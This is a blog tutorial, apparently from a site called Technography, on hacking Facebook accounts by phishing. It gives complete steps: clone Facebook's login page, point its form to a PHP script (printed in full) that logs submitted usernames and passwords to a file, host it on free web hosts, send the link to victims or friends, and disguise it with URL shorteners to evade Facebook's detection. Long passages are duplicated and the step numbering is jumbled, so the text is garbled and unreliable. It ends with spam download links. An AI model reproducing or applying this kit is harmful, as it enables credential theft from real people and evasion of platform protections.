what is phishing ?
Phishing is an old method of e-mail fraud that is used to gather personal and financial information from the recipients. phishing is the act of attempting to acquire information such as usernames, passwords, and credit card details (and sometimes, indirectly, money) by masquerading as a trustworthy entity in an electronic communication.Phishing is an example of a social engineering technique.
***Step by step guide to hack Facebook account using phishing ***
Now lets start our tutorial which is all about how to make facebook phishing page without having the knowledge of any type of coding .
step:1) first of all Go to the Facebook.com
step:2) and then right click on the blank area, you will see the option view source page,simply click on that.(see bellow picture for better understanding )
step:3) now a pop up window will be open which contain a source code of Facebook page, And Copy all the code using Ctrl+c
Now lets start our tutorial which is all about how to make facebook phishing page without having the knowledge of any type of coding .
step:1) first of all Go to the Facebook.com
step:2) and then right click on the blank area, you will see the option view source page,simply click on that.(see bellow picture for better understanding )
step:3) now a pop up window will be open which contain a source code of Facebook page, And Copy all the code using Ctrl+c
step:5) now press CTRL+F,and type ACTION.(see bellow picture)
step:6) You will have to search action again and again till you get like bellow code
action=" https://www.facebook.com/login.php?login_attempt=1 "
step:7) After that delete all the text written in blue color and instead of it write hack.php.then it will look like.( see bellow given picture)
action="hack.php"
step:8) Now save it on your desktop with the name index.htm,not index.html,remember.
step:9) Now your phishing page is ready.it will look like a pic given bellow .
step:9) now you need to create a php file for this Open a new notepad and copy the bellow code and save it with the name hack.php.
<?php
header ('Location:http://www.google/');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Note: I use hack.php in step 7 that's why we need to use same name in step 9
step:10) You have successfully created two files
step:11) now you need to upload these two files in a free web hosting site i am giving you the list of best webhosting site which are useful for you . you need to make a account on any of one below webhosting site.(I think the list is perfect for you)
www.my3gb.com
www.000webhost.com
www.freewebhosting.com
www.xhosting.com
http://110mb.com
http://ripway.com
http://superfreehost.info
http://freehostia.com
http://freeweb7.com
http://t35.com
http://awardspace.com
http://phpnet.us
http://prohosts.org
http://www.freezoka.com/
http://atspace.com
step:12) I prefer my3gb.com because it is easy to use first of all go to www.my3gb.com and click on register button which is located in upper side bar.
step:13) now simply fill all required information in registration form
step:14) when your account completely setup simply log in with your username and password
step:6) You will have to search action again and again till you get like bellow code
action=" https://www.facebook.com/login.php?login_attempt=1 "
step:7) After that delete all the text written in blue color and instead of it write hack.php.then it will look like.( see bellow given picture)
action="hack.php"
step:8) Now save it on your desktop with the name index.htm,not index.html,remember.
step:9) Now your phishing page is ready.it will look like a pic given bellow .
step:9) now you need to create a php file for this Open a new notepad and copy the bellow code and save it with the name hack.php.
<?php
header ('Location:http://www.google/');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Note: I use hack.php in step 7 that's why we need to use same name in step 9
step:10) You have successfully created two files
- index.htm
- hack .php,
step:11) now you need to upload these two files in a free web hosting site i am giving you the list of best webhosting site which are useful for you . you need to make a account on any of one below webhosting site.(I think the list is perfect for you)
www.my3gb.com
www.000webhost.com
www.freewebhosting.com
www.xhosting.com
http://110mb.com
http://ripway.com
http://superfreehost.info
http://freehostia.com
http://freeweb7.com
http://t35.com
http://awardspace.com
http://phpnet.us
http://prohosts.org
http://www.freezoka.com/
http://atspace.com
step:12) I prefer my3gb.com because it is easy to use first of all go to www.my3gb.com and click on register button which is located in upper side bar.
step:13) now simply fill all required information in registration form
step:14) when your account completely setup simply log in with your username and password
step:15) when you open your account you see control panel like bellow picture ,now click on file manager.
step:16) now file manager will open and you need to upload index.htm and hack.php file ,simply click on upload files button and upload both files there after uploading it look like bellow picture.
step:17) now click on index.htm file you see fake Facebook page simply copy the URL from your web browser URL address bar .your link look like bellow :
http://www.yourusername.my3gb.com/index.htm
step:18) now you almost done simply send this link to your victim or friends .
step:19) when victim open that link he see fake Facebook page which look like real and enter there username and password and hit log in his password send to your my3gb account.
step:20) for seeing password simply go to my3gb.com >>control panel >>file manager,and here you see new file with name usernames.txt .open it and see the password.
step:16) now file manager will open and you need to upload index.htm and hack.php file ,simply click on upload files button and upload both files there after uploading it look like bellow picture.
step:17) now click on index.htm file you see fake Facebook page simply copy the URL from your web browser URL address bar .your link look like bellow :
http://www.yourusername.my3gb.com/index.htm
step:18) now you almost done simply send this link to your victim or friends .
step:19) when victim open that link he see fake Facebook page which look like real and enter there username and password and hit log in his password send to your my3gb account.
step:20) for seeing password simply go to my3gb.com >>control panel >>file manager,and here you see new file with name usernames.txt .open it and see the password.
warning :
you are not able to send your phishing link to friends in Facebook because Facebook detect it and give warning to delete that link.
if you want to send your link via Facebook or other social networking site then you need to use URL shortening I prefer to use www.tinyurl.com because it is easy to use and Facebook security not detect it easily.if tinyurl not allowed phishing link then try another websites. if you don't know how to short your link for Facebook follow bellow steps
you are not able to send your phishing link to friends in Facebook because Facebook detect it and give warning to delete that link.
if you want to send your link via Facebook or other social networking site then you need to use URL shortening I prefer to use www.tinyurl.com because it is easy to use and Facebook security not detect it easily.if tinyurl not allowed phishing link then try another websites. if you don't know how to short your link for Facebook follow bellow steps
- first of all go to www.tinyurl.com
- 2) past your phishing URL in the box and hit make tiny URL button.
- 3) after that you get your short link simply send that link to your friends.
Technography: Step By Step Guide To Hack Facebook Account Using Phishing Method >>>>> Download Now
ReplyDelete>>>>> Download Full
Technography: Step By Step Guide To Hack Facebook Account Using Phishing Method >>>>> Download LINK
>>>>> Download Now
Technography: Step By Step Guide To Hack Facebook Account Using Phishing Method >>>>> Download Full
>>>>> Download LINK hh